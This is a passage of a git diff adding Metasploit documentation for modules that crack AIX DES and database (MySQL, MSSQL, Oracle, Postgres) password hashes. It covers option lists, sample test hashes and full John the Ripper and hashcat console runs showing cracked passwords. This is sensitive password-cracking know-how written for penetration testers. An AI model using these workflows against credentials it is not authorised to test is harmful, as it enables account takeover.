+[+] User 1 named testuser found with password hash auth. Enable permission: 02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+

documentation/modules/auxiliary/admin/scada/phoenix_command.md

@@ -64,7 +64,7 @@ msf auxiliary(phoenix_command) > run
 [*] Auxiliary module execution completed
 ```
 
-## Module Options
+## Options
 ```
 msf auxiliary(phoenix_command) > show options
 

documentation/modules/auxiliary/admin/wemo/crockpot.md

@@ -1,4 +1,4 @@
-## Intro
+## Introduction
 
 This module acts as a simple remote control for Belkin Wemo-enabled
 Crock-Pots by implementing a subset of the functionality provided by the

documentation/modules/auxiliary/analyze/crack_aix.md

@@ -0,0 +1,292 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode AIX 
+  based password hashes, such as:
+
+  * `DES` based passwords
+
+  Formats:
+
+| Common | John     | Hashcat |
+|--------| ---------|---------|
+| des    | descript | 1500    |
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with a `des` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_aix```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **john**
+
+   Use john the ripper (default).
+
+   **hashcat**
+
+   Use hashcat.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+creds add user:des2_password hash:rEK1ecacw.7.c jtr:des
+creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+creds add user:des_55 hash:rDpJV6xlcXxRM jtr:des
+creds add user:des_pot_55 hash:fakeV6xlcXxRM jtr:des
+creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
+echo "fakeV6xlcXxRM:55" >> /root/.msf4/john.pot
+echo "test" > /tmp/wordlist
+echo "password" >> /tmp/wordlist
+```
+
+### John the Ripper
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_aix
+resource (hashes_hashcat.rb)> run
+[+] john Version Detected: 1.9.0-jumbo-1 OMP
+[*] Hashes Written out to /tmp/hashes_tmp20190531-27621-1ucwc3l
+[*] Wordlist file written out to /tmp/jtrtmp20190531-27621-qk76qr
+[*] Checking descrypt hashes already cracked...
+[*] Cracking descrypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=Z5uRTsvO --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --wordlist=/tmp/jtrtmp20190531-27621-qk76qr --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-27621-1ucwc3l
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:06) 100.0g/s 1103Kp/s 4415Kc/s 4415KC/s test3:::..t1900
+Warning: passwords printed above might be partial and not be all those cracked
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking descrypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=Z5uRTsvO --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --max-run-time=60 /tmp/hashes_tmp20190531-27621-1ucwc3l
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+3g 0:00:00:00 DONE 1/3 (2019-05-31 15:06) 300.0g/s 614200p/s 614400c/s 614400C/s des_pass..Dde_pass
+Warning: passwords printed above might be partial
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking descrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=Z5uRTsvO --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-27621-1ucwc3l
+Using default input encoding: UTF-8
+[*] Cracking descrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=Z5uRTsvO --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --wordlist=/tmp/jtrtmp20190531-27621-qk76qr --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-27621-1ucwc3l
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username        Cracked Password  Method
+ -----  ---------  --------        ----------------  ------
+ 1250   descrypt   des2_password   password          Single
+ 1251   descrypt   des_password    password          Single
+ 1252   descrypt   des_55          55                Normal
+ 1253   descrypt   des_pot_55      55                Already Cracked/POT
+ 1254   descrypt   des_passphrase  passphrase        Normal
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public          private                   realm  private_type        JtR Format
+----  ------  -------  ------          -------                   -----  ------------        ----------
+                       des2_password   rEK1ecacw.7.c                    Nonreplayable hash  des
+                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
+                       des_55          rDpJV6xlcXxRM                    Nonreplayable hash  des
+                       des_pot_55      fakeV6xlcXxRM                    Nonreplayable hash  des
+                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
+                       des_pot_55      55                               Password            
+                       des2_password   password                         Password            
+                       des_password    password                         Password            
+                       des_55          55                               Password            
+                       des_passphrase  passphrase                       Password
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_aix
+resource (hashes_hashcat.rb)> set action hashcat
+action => hashcat
+resource (hashes_hashcat.rb)> run
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20190531-27714-1ct3bn3
+[*] Wordlist file written out to /tmp/jtrtmp20190531-27714-1j3q151
+[*] Checking descrypt hashes already cracked...
+[*] Cracking descrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=wCGD0gD0 --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1500 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-27714-1ct3bn3
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking descrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=wCGD0gD0 --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1500 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-27714-1ct3bn3 /tmp/jtrtmp20190531-27714-1j3q151
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username       Cracked Password  Method
+ -----  ---------  --------       ----------------  ------
+ 1260   descrypt   des2_password  password          Wordlist
+ 1261   descrypt   des_password   password          Wordlist
+ 1262   descrypt   des_55         55                Incremental
+ 1263   descrypt   des_pot_55     55                Already Cracked/POT
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public          private                   realm  private_type        JtR Format
+----  ------  -------  ------          -------                   -----  ------------        ----------
+                       des2_password   rEK1ecacw.7.c                    Nonreplayable hash  des
+                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
+                       des_55          rDpJV6xlcXxRM                    Nonreplayable hash  des
+                       des_pot_55      fakeV6xlcXxRM                    Nonreplayable hash  des
+                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
+                       des_pot_55      55                               Password            
+                       des_55          55                               Password            
+                       des2_password   password                         Password            
+                       des_password    password                         Password
+```

documentation/modules/auxiliary/analyze/crack_databases.md

@@ -0,0 +1,920 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode varying databases
+  based password hashes, such as:
+
+  * `mysql` based passwords
+    * `mysql` based passwords
+    * `mysql-sha1` based passwords
+  * `mssql` based passwords
+    * `mssql` based passwords
+    * `mssql05` based passwords
+    * `mssql12` based passwords
+  * `oracle` based passwords
+    * `oracle 10` based passwords
+    * `oracle 11/12 H values` based passwords
+    * `oracle 12c` based passwords
+  * `postgres` based passwords
+
+
+| Common         | John        | Hashcat |
+|----------------|-------------|---------|
+| mysql          | mysql       | 200     |
+| mysql-sha1     | mysql-sha1  | 300     |
+| mssql          | mssql       | 131     |
+| mssql05        | mssql05     | 132     |
+| mssql12        | mssql12     | 1731    |
+| oracle 10      | oracle      | n/a     |
+| oracle 11/12 H |             | 112     |
+| oracle 12c     | sha512crypt | 12300   |
+| postgres       | postgres    | 1800    |
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with a database password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_databases```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **john**
+
+   Use john the ripper (default).
+
+   **hashcat**
+
+   Use hashcat.
+
+## Options
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MSSQL**
+
+   Crack MSSQL hashes. Default is `true`.
+
+   **MYSQL**
+
+   Crack MySQL hashes. Default is `true`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **ORACLE**
+
+   Crack oracle hashes. Default is `true`.
+
+
+   **POSTGRES**
+
+   Crack postgres hashes. Default is `true`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
+creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279$
+creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E278$
+creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
+creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
+## oracle (10) uses usernames in the hashing, so we can't overide that here
+creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
+creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
+## oracle 11/12 H value, username is used
+creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797$
+## oracle 11/12 uses a LONG format, see lib/msf/core/auxiliary/jtr.rb
+creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:$
+creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B3$
+##postgres uses username, so we can't overide that here
+creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
+creds add user:example postgres:md5be86a79bf20fake2d58d5453c47d4860
+echo "" > /root/.msf4/john.pot
+echo "fakeV6xlcXxRM:55" >> /root/.msf4/john.pot
+echo "md5be86a79bf20fake2d58d5453c47d4860:password" >> /root/.msf4/john.pot
+echo "\$1\$O3JMY.Tw\$AdLnLjQ/5jXF9.fakegHv/:password" >> /root/.msf4/john.pot
+echo "test" > /tmp/wordlist
+echo "password" >> /tmp/wordlist
+echo "toto" >> /tmp/wordlist
+echo "foo" >> /tmp/wordlist
+echo "tere" >> /tmp/wordlist
+echo "Password1\!" >> /tmp/wordlist
+echo "system" >> /tmp/wordlist
+echo "simon" >> /tmp/wordlist
+echo "A" >> /tmp/wordlist
+echo "THALES" >> /tmp/wordlist
+echo "probe" >> /tmp/wordlist
+echo "epsilon" >> /tmp/wordlist
+echo "t\!" >> /tmp/wordlist
+```
+
+### John the Ripper
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_databases
+resource (hashes_hashcat.rb)> run
+[+] john Version Detected: 1.9.0-jumbo-1 OMP
+[*] Hashes Written out to /tmp/hashes_tmp20190531-29358-125bmsb
+[*] Wordlist file written out to /tmp/jtrtmp20190531-29358-11uv1t0
+[*] Checking mssql hashes already cracked...
+[*] Cracking mssql hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=RiixU30Z --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:44) 50.00g/s 400.0p/s 400.0c/s 400.0C/s TEST3:::..FOO
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mssql hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=RiixU30Z --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=RiixU30Z --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=RiixU30Z --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=RiixU30Z --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username   Cracked Password  Method
+ -----  ---------  --------   ----------------  ------
+ 1357   mssql      mssql_foo  FOO               Single
+
+[*] Checking mssql05 hashes already cracked...
+[*] Cracking mssql05 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=3FMqTSQB --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql05 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+2g 0:00:00:00 DONE (2019-05-31 15:44) 100.0g/s 400.0p/s 800.0c/s 800.0C/s test3:::..foo
+Use the "--show --format=mssql05" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mssql05 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=3FMqTSQB --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql05 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql05 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=3FMqTSQB --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql05 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql05 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=3FMqTSQB --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql05 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql05 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=3FMqTSQB --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql05 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1356   mssql05    mssql05_toto  toto              Single
+ 1357   mssql      mssql_foo     FOO               Single
+
+[*] Checking mssql12 hashes already cracked...
+[*] Cracking mssql12 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=Hgkng17W --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql12 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:44) 50.00g/s 409600p/s 409600c/s 409600C/s test3:::..Password1\!99
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mssql12 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=Hgkng17W --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql12 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql12 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=Hgkng17W --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql12 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql12 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=Hgkng17W --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql12 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql12 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=Hgkng17W --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql12 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username            Cracked Password  Method
+ -----  ---------  --------            ----------------  ------
+ 1356   mssql05    mssql05_toto        toto              Single
+ 1357   mssql      mssql_foo           FOO               Single
+ 1358   mssql12    mssql12_Password1!  Password1!        Single
+
+[*] Checking mysql hashes already cracked...
+[*] Cracking mysql hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=8zGhJlFs --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:45) 100.0g/s 51200p/s 51200c/s 51200C/s test3:::..est3:::
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mysql hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=8zGhJlFs --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mysql hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=8zGhJlFs --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mysql hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=8zGhJlFs --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mysql hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=8zGhJlFs --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username            Cracked Password  Method
+ -----  ---------  --------            ----------------  ------
+ 1356   mssql05    mssql05_toto        toto              Single
+ 1357   mssql      mssql_foo           FOO               Single
+ 1358   mssql12    mssql12_Password1!  Password1!        Single
+ 1359   mysql      mysql_probe         probe             Single
+
+[*] Checking mysql-sha1 hashes already cracked...
+[*] Cracking mysql-sha1 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJ1VeTcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql-sha1 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:45) 100.0g/s 1600p/s 1600c/s 1600C/s tere..probe
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mysql-sha1 hashes in normal mode
